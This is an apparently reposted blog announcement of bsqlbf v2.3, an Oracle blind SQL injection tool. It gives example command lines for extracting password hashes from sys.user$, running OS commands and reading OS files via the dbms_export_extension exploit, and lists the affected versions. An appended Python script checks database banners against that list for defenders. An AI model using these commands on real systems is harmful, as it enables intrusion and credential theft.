from: http://www.pcsec.org/archives/Bsqlbf-v-23-With-Enhanced-Oracle-Exploitation.html
A new version of bsqlbf is now available. The following are the new additions:
Posted by Sid
--------------------
-type: type of injection:
3: Type 3 is extracting data with DBA privileges (e.g. Oracle password hashes from sys.user$)
4: Type 4 is O.S. code execution (default: ping 127.0.0.1)
5: Type 5 is reading O.S. files (default: c:\boot.ini)
--------------------
Type 4 (O.S. code execution) supports the following sub types:
-stype: how you want to execute the command:
0: stype 0 (default) is based on Java, universal but won't work against XE
1: stype 1 against Oracle 9 with plsql_native_make_utility
2: stype 2 against Oracle 10 with DBMS_Scheduler
--------
Examples:
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match "true" -sql "select password from sys.user$ where rownum=1"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match "true" -file "c:\boot.ini"
-------
Download from the project homepage: http://code.google.com/p/bsqlbf-v2/
-------
All these additions are based on the dbms_export_extension exploit. This will work against the following Oracle versions:
Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE
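For database owners, the version list above can be turned into an inventory check. The following is an added example, not part of the original post or of bsqlbf: it compares v$version-style banner strings against the listed ranges. The host names, sample banners and status labels are constructed for illustration, and treating the ranges as inclusive is an assumption.

```python
import re

# Version ranges copied from the post above (assumed inclusive on both ends).
LISTED_RANGES = [
    ("8.1.7.4", "8.1.7.4"),
    ("9.2.0.1", "9.2.0.7"),
    ("10.1.0.2", "10.1.0.4"),
    ("10.2.0.1", "10.2.0.2"),
]

def parse_version(text):
    """Return the first dotted version in text as a 4-tuple of ints, or None."""
    m = re.search(r"\b(\d+(?:\.\d+){2,4})\b", text)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")][:4]  # post lists 4 components
    return tuple(parts + [0] * (4 - len(parts)))

def triage(banner):
    """Classify one banner line against the post's version list."""
    version = parse_version(banner)
    if version is None:
        return "unknown"
    for low, high in LISTED_RANGES:
        if parse_version(low) <= version <= parse_version(high):
            return "listed"
    # The post names XE without a version number, so an Express Edition
    # banner outside the numeric ranges is sent for manual review.
    if "express edition" in banner.lower():
        return "review"
    return "not-listed"

# Constructed sample inventory (host names and banners are illustrative).
SAMPLE_INVENTORY = {
    "db-legacy-01": "Oracle9i Enterprise Edition Release 9.2.0.6.0 - Production",
    "db-app-02": "Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit",
    "db-dev-03": "Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product",
    "db-new-04": "Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit",
    "db-odd-05": "banner unavailable",
}

def report(inventory):
    """Map each host to its triage status."""
    return {host: triage(banner) for host, banner in inventory.items()}

if __name__ == "__main__":
    for host, status in report(SAMPLE_INVENTORY).items():
        print(f"{host:14} {status}")
```

The banner alone does not show which Critical Patch Updates are installed, so a "listed" result is a prompt to check the patch level rather than a final verdict.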
--------
Enjoy...